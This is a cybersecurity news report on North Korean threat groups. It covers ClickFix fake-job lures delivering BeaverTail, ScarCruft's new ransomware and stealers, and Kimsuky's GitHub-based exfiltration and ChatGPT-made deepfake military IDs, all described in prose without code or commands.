Threat actors with ties to the Democratic People's Republic of Korea (aka DPRK or North Korea) have been observed leveraging ClickFix-style lures to deliver a known malware called BeaverTail and InvisibleFerret.
"The threat actor used ClickFix lures to target marketing and trader roles in cryptocurrency and retail sector organizations rather than targeting software development roles," GitLab Threat Intelligence researcher Oliver Smith said in a report published last week.
First exposed by Palo Alto Networks in late 2023, BeaverTail and InvisibleFerret have been deployed by North Korean operatives as part of a long-running campaign dubbed Contagious Interview (aka Gwisin Gang), wherein the malware is distributed to software developers under the pretext of a job assessment. Assessed to be a subset of the umbrella group Lazarus, the cluster has been active since at least December 2022.
Over the years, BeaverTail has also been propagated via bogus npm packages and fraudulent Windows videoconferencing applications like FCCCall and FreeConference. Written in JavaScript, the malware acts as an information stealer and a downloader for a Python-based backdoor known as InvisibleFerret.
An important evolution of the campaign involves the use of the ClickFix social engineering tactic to deliver malware such as GolangGhost, PylangGhost, and FlexibleFerret – a sub-cluster of activity tracked as ClickFake Interview.
The latest attack wave, observed in late May 2025, is worth highlighting for two reasons: Employing ClickFix to deliver BeaverTail (rather than GolangGhost or FlexibleFerret) and delivering the stealer in the form of a compiled binary produced using tools like pkg and PyInstaller for Windows, macOS, and Linux systems.
A fake hiring platform web application created using Vercel serves as a distribution vector for the malware, with the threat actor advertising cryptocurrency trader, sales, and marketing roles at various Web3 organizations, as well as urging targets to invest in a Web3 company.
"The threat actor's targeting of marketing applicants and impersonation of a retail sector organization is noteworthy given BeaverTail distributors' usual focus on software developers and the cryptocurrency sector," Smith said.
Users who land on the site have their public IP addresses captured and are instructed to complete a video assessment of themselves, at which point a fake technical error about a non-existent microphone issue is displayed and they are asked to an operating system-specific command to supposedly address the problem, effectively leading to the deployment of a leaner version of BeaverTail either by means of a shell script or Visual Basic Script.
"The BeaverTail variant associated with this campaign contains a simplified information stealer routine and targets fewer browser extensions," GitLab said. "The variant targets only eight browser extensions rather than the 22 targeted in other contemporary BeaverTail variants."
Another important omission is the removal of functions related to stealing data from web browsers other than Google Chrome. The Windows version of BeaverTail has also been found relying on a password-protected archive shipped along with the malware to load Python dependencies related to InvisibleFerret.
While password-protected archives are a fairly common technique that various threat actors have adopted for some time, this is the first time the method has been used for payload delivery in connection with BeaverTail, indicating that the threat actors are actively refining their attack chains.
What's more, the low prevalence of secondary artifacts in the wild and the absence of social engineering finesse suggest that the campaign may have been a limited test and unlikely to be deployed at scale.
"The campaign suggests a slight tactical shift for a subgroup of North Korean BeaverTail operators, expanding beyond their traditional software developer targeting to pursue marketing and trading roles across cryptocurrency and retail sectors," GitLab said. "The move to compiled malware variants and continued reliance on ClickFix techniques demonstrates operational adaptation to reach less technical targets and systems without standard software development tools installed."
The development comes as a joint investigation from SentinelOne, SentinelLabs, and Validin found that at least 230 individuals have been targeted by the Contagious Interview campaign in fake cryptocurrency job interview attacks between January and March 2025 by impersonating companies such as Archblock, Robinhood, and eToro.
This campaign essentially involved using ClickFix themes to distribute malicious Node.js applications dubbed ContagiousDrop that are designed to deploy malware disguised as updates or essential utilities. The payload is tailored to the victim's operating system and system architecture. It's also capable of cataloging victim activities and triggering an email alert when the affected individual starts the fake skill assessment.
"This activity [...] involved the threat actors examining cyber threat intelligence (CTI) information related to their infrastructure," the companies noted, adding the attackers engaged in a coordinated effort to evaluate new infrastructure before acquisition as well as monitor for signs of detection of their activity through Validin, VirusTotal, and Maltrail.
The information gleaned from such efforts is meant to improve the resilience and effectiveness of their campaigns, as well as rapidly deploy new infrastructure following service provider takedowns, reflecting a focus on investing resources to sustain their operations rather than enacting broad changes to secure their existing infrastructure.
"Given the continuous success of their campaigns in engaging targets, it may be more pragmatic and efficient for the threat actors to deploy new infrastructure rather than maintain existing assets," the researchers said. "Potential internal factors, such as decentralized command structures or operational resource constraints, may restrict their capacity to rapidly implement coordinated changes."
"Their operational strategy appears to prioritize promptly replacing infrastructure lost due to takedown efforts by service providers, using newly provisioned infrastructure to sustain their activity."
North Korean hackers have a long history of attempting to gather threat intelligence to further their operations. As early as 2021, Google and Microsoft revealed that Pyongyang-backed hackers targeted security researchers working on vulnerability research and development using a network of fake blogs and social media accounts to steal exploits.
Then last year, SentinelOne warned of a campaign undertaken by ScarCruft (aka APT37) targeting consumers of threat intelligence reporting with fake technical reports as decoys to deliver RokRAT, a custom-written backdoor exclusively used by the North Korean threat group.
However, recent ScarCruft campaigns have witnessed a departure of sorts, taking the unusual step of infecting targets with custom VCD ransomware, alongside an evolving toolkit comprising stealers and backdoors CHILLYCHINO (aka Rustonotto) and FadeStealer. A Rust-based implant, CHILLYCHINO is a new addition to the threat actor's arsenal from June 2025. It's also the first known instance of APT37 using a Rust-based malware to target Windows systems.
FadeStealer, on the other hand, is a surveillance tool first identified in 2023 that's equipped to log keystrokes, capture screenshots and audio, track devices and removable media, and exfiltrate data through password-protected RAR archives. It leverages HTTP POST and Base64 encoding for communication with its command-and-control (C2) server.
The attack chain, per Zscaler ThreatLabz, entails using spear-phishing messages to distribute ZIP archives containing Windows shortcuts (LNK) or help files (CHM) that drop CHILLYCHINO or its known PowerShell counterpart Chinotto, which then contacts the C2 server to retrieve a next-stage payload responsible for launching FadeStealer.
"The discovery of ransomware marks a significant shift from pure espionage operations toward financially motivated and potentially destructive activity," S2W said. "This evolution highlights not only functional diversification but also a broader strategic realignment in the group's objectives."
New Kimsuky Campaigns Exposed
The findings also come as the North Korea-aligned Kimsuky (aka APT43) hacking group -- which allegedly suffered a breach, likely exposing the tactics and tools of a China-based actor working for the Hermit Kingdom (or that of a Chinese operator emulating its tradecraft) -- has been attributed to two different campaigns, one of which involves the abuse of GitHub repositories for delivering stealer malware and data exfiltration.
"The threat actor leveraged a malicious LNK file [present within ZIP archives] to download and execute additional PowerShell-based scripts from a GitHub repository," S2W said. "To access the repository, the attacker embedded a hardcoded GitHub Private Token directly within the script."
The PowerShell script retrieved from the repository comes fitted with capabilities to collect system metadata, including last boot time, system configuration, and running processes; write the information to a log file; and upload it to the attacker-controlled repository. It also downloads a decoy document to avoid raising any suspicion.
Given the use of trusted infrastructure for malicious purposes, users are advised to monitor traffic to api.github.com and the creation of suspicious scheduled tasks, indicating persistence.
The second campaign tied to Kimsuky concerns the abuse of OpenAI's ChatGPT to forge deepfake military ID cards in a spear-phishing campaign against South Korean defense-affiliated entities and other individuals focused on North Korean affairs, such as researchers, human rights activists, and journalists.
Phishing emails using the military ID deepfake decoy were observed on July 17, 2025, following a series of ClickFix-based phishing campaigns between June 12 and 18, paving the way for malware that facilitates data theft and remote control.
The multi-stage infection chain has been found to employ ClickFix-like CAPTCHA verification pages to deploy an AutoIt script that connects to an external server to run batch file commands issued by the attacker, South Korean cybersecurity company Genians said in a report published last week.
Alternately, the burst of recent attacks have also relied on bogus email messages to redirect unsuspecting users to credential harvesting pages as well as sending messages with booby-trapped links that, when clicked, download a ZIP archive containing a LNK file, which, in turn, executes a PowerShell command to download synthetic imagery created using ChatGPT and batch script that ultimately does the same AutoIt script in a cabinet archive file.
"This was classified as an APT attack impersonating a South Korean defense-related institution, disguised as if it were handling ID issuance tasks for military-affiliated officials," Genians said. "This is a real case demonstrating the Kimsuky group's application of deepfake technology."
